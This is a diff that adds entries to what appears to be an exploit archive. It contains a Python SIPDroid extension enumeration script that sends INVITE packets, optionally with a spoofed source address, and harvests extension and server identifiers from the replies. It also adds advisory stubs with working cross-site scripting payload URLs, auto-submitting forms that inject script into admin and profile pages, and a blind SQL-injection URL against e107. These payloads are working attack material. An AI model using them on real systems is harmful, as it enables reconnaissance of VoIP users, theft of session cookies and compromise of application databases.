+headers['Call-ID'] = "%s@%s" % (callid,srchost)
+if contact is not None:
+headers['Contact'] = contact
+headers['CSeq'] = '%s %s' % (cseq,method)
+headers['Max-Forwards'] = 70
+headers['Accept'] = accept
+if contentlength is None:
+headers['Content-Length'] = len(body)
+else:
+headers['Content-Length'] = contentlength
+if contenttype is None and len(body) > 0:
+contenttype = 'application/sdp'
+if contenttype is not None:
+headers['Content-Type'] = contenttype
+
+r = '%s %s SIP/2.0\r\n' % (method,uri)
+for h in superheaders.iteritems():
+r += '%s: %s\r\n' % h
+for h in headers.iteritems():
+r += '%s: %s\r\n' % h
+for h in finalheaders.iteritems():
+r += '%s: %s\r\n' % h
+r += '\r\n'
+r += body
+return r, branchunique
+
+
+----[SIPDroid-Extension_Enum.py]----------------------------------------------------------------------------------------
+
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+# Author: Anibal Aguiar - anibal.aguiar *SPAM* tempest.com.br
+#
+# Dependences:
+#
+# optparse - The optparse library can be installed using the linux
+repository
+# of your distro.
+#
+# myHelper -- myHelper.py should be placed at the same diretory of
+SIPDroid-Extension_Enum.py
+#
+# This software is based on some functions of sipvicious-0.2.6.
+#
+# This code is only for security researches/teaching purposes,use at
+your own risk!
+#
+
+import sys
+import random
+import re
+from optparse import OptionParser
+from socket import *
+from myhelper import *
+
+
+parse = OptionParser()
+parse.add_option("-i", "--ip", dest="ip", help="Target IP range (CIDR or
+unique IP). (MANDATORY)")
+parse.add_option("-s", "--source", dest="source", help="Source IP
+number. (MANDATORY)")
+parse.add_option("-f", "--srcfake", dest="srcfake", help="Source IP
+number (fake).")
+parse.add_option("-p", "--dstport", dest="dstport", default=5060,
+help="Destine port number (MAMDATORY due to SIPDroid Random port).
+(default 5060)")
+parse.add_option("-e", "--extension", dest="exten", default=None,
+help="Destine extension. (default None)")
+parse.add_option("-t", "--tag", dest="tag", default=None, help="Call
+TAG. (default random)")
+parse.add_option("-v", "--verbose", action="store_true", dest="debug",
+default="False", help="Verbose mode - print pakets sent and received.
+(default False)")
+
+(options, arg) = parse.parse_args()
+
+if not options.exten:
+extension = "SIPDROID"
+else:
+extension = options.exten
+if not options.srcfake:
+srcfake = '1.1.1.1'
+else:
+srcfake = options.srcfake
+dstport = int(options.dstport)
+
+if not options.ip or not options.source:
+print printmsg("Sintaxe erro. Try %s --help" % sys.argv[0], "WARNING")
+sys.exit(1)
+else:
+dsthost = options.ip
+fromhost = options.source
+if options.tag is None:
+tag = random.getrandbits(22)
+else:
+tag = options.tag
+
+buf = 1024
+addr = (dsthost,dstport)
+cid='%s' % str(random.getrandbits(32))
+branch=None
+srcaddr = (fromhost,5062)
+
+# Create socket
+UDPSock = socket(AF_INET,SOCK_DGRAM)
+# Binding on 5060
+UDPSock.bind(srcaddr)
+
+# Send messages
+method = "INVITE"
+(header,branch) =
+makeRequest(method,extension,dsthost,dsthost,dstport,cid,srcfake,branch,tag)
+if(UDPSock.sendto(header, addr)):
+sent = True
+if options.debug is True:
+print printmsg("Data Sent:", "WARNING")
+print header
+print printmsg("INVITE sent to %s!\n" % dsthost, "Green")
+else:
+sent = False
+
+# Receive messages
+while sent:
+try:
+UDPSock.settimeout(4)
+data,bindaddr = UDPSock.recvfrom(buf)
+if options.debug is True:
+print printmsg("Data Received:", "WARNING")
+print data
+if re.search('SIP/2.0 180 Ringing', data):
+packet = data.split('\n')
+for packetline in packet:
+for origin in re.finditer('o\=[a-zA-Z0-9\-]+\@[a-zA-Z0-9.\-]+', packetline):
+print printmsg("o=<extension>@<server>: %s\n" % origin.group(0), "Blue")
+
+method = 'CANCEL'
+(header, branch) =
+makeRequest(method,extension,dsthost,dsthost,dstport,cid,srcfake,branch,tag)
+if options.debug is True:
+print printmsg("Data Sent:", "WARNING")
+print header
+UDPSock.sendto(header, addr)
+sent = False
+except Exception as excpt:
+print excpt
+print printmsg("OPS... Timeout on receving data or something wrong with
+socket... take a look at dest. port number too (-p option).", "WARNING")
+sent = False
+
+# Close socket
+UDPSock.close()
+
+
--- a/platforms/php/webapps/35697.txt
+++ b/platforms/php/webapps/35697.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47682/info
+
+Web Auction is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Web Auction 0.3.6 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/webauction-0.3.6/dataface/lib/jscalendar/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(0)// 
--- a/platforms/php/webapps/35699.txt
+++ b/platforms/php/webapps/35699.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/47697/info
+
+E2 Photo Gallery is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/uploader/index.php/[xss] 
--- a/platforms/php/webapps/35700.txt
+++ b/platforms/php/webapps/35700.txt
@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/47698/info
+
+YaPIG is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+YaPIG 0.95 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/template/default/add_comment_form.php?I_ADD_COMMENT=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/template/default/admin_task_bar.php?I_ADMIN_TASKS=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/template/default/delete_gallery_form.php?I_SELECT_OPT=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/template/default/face_begin.php?I_TITLE=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
+http://www.example.com/slideshow.php?interval=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
--- a/platforms/php/webapps/35701.txt
+++ b/platforms/php/webapps/35701.txt
@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/47701/info
+
+SelectaPix is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+SelectaPix 1.4.1 is vulnerable; other versions may also be affected. 
+
+<form action="http://www.example.com/admin/upload.php?albumID=1&parentID=0&request=single" method="post" name="main" id="main">
+<input type="hidden" name="uploadername" value=&#039;"><script>alert(document.cookie);</script>&#039;>
+<input type="submit" value="OK">
+</form>
--- a/platforms/php/webapps/35702.txt
+++ b/platforms/php/webapps/35702.txt
@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/47702/info
+
+Multiple GoT.MY products are prone to a cross-site scripting vulnerability.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials; other attacks are possible.
+
+The following are vulnerable:
+Classified ADs 2.9.1
+Classmates 1.1.1
+Deal Informer 4.8.0 
+
+http://www.example.com/themes/default/header.inc.php?theme_dir=%22%3E%3Cscript%3E
+alert%28document.cookie%29;%3C/script%3E
--- a/platforms/php/webapps/35704.txt
+++ b/platforms/php/webapps/35704.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47726/info
+
+WP Ajax Calendar is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+WP Ajax Calendar 1.0 is vulnerability; other versions may also be affected. 
+
+http://www.example.com/example.php?y=[xss] 
--- a/platforms/php/webapps/35705.txt
+++ b/platforms/php/webapps/35705.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47727/info
+
+PHP Directory Listing is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+PHP Directory Listing script 3.1 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/index.php/[xss] 
--- a/platforms/php/webapps/35708.txt
+++ b/platforms/php/webapps/35708.txt
@ -0,0 +1,49 @@
+source: http://www.securityfocus.com/bid/47733/info
+
+PHPDug is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+PHPDug 2.0.0 is vulnerable; other versions may also be affected. 
+
+1.
+<form action="http://www.example.com/add_story.php" method="post" name="main">
+<input type="hidden" name="story_url" value=&#039;http://www.example.com/"><script>alert(document.cookie)</script>&#039;>
+<input type="hidden" name="Submit" value="Continue">
+</form>
+<script>
+document.main.submit();
+</script>
+
+2.
+<form action="http://www.example.com/editprofile.php" method="post" name="main">
+<input type="hidden" name="email" value=&#039;email@example.com"><script>alert(document.cookie)</script>&#039;>
+<input type="hidden" name="commentst" value="-4">
+<input type="hidden" name="Submit" value="Save Changes">
+</form>
+<script>
+document.main.submit();
+</script>
+
+3.
+<form action="http://www.example.com/adm/content_add.php" method="post" name="main">
+<input type="hidden" name="id" value="999">
+<input type="hidden" name="title" value=&#039;page"><script>alert(document.cookie)</script>&#039;>
+<input type="hidden" name="contentvalue="content">
+<input type="hidden" name="Submit" value="Submit">
+</form>
+<script>
+document.main.submit();
+</script>
+
+4.
+<form action="http://www.example.com/adm/admin_edit.php" method="post" name="main">
+<input type="hidden" name="id[1]" value="1">
+<input type="hidden" name="username[1]" value=&#039;admin<script>alert("XSS")</script>&#039;>
+<input type="hidden" name="password[1]" value="">
+<input type="hidden" name="Submit" value="Submit">
+</form>
+<script>
+document.main.submit();
+</script>
+
--- a/platforms/php/webapps/35709.txt
+++ b/platforms/php/webapps/35709.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47750/info
+
+e107 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+e107 0.7.25 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/news.php?extend.9999999%0aAND%0aSUBSTRING(@@version,1,1)=5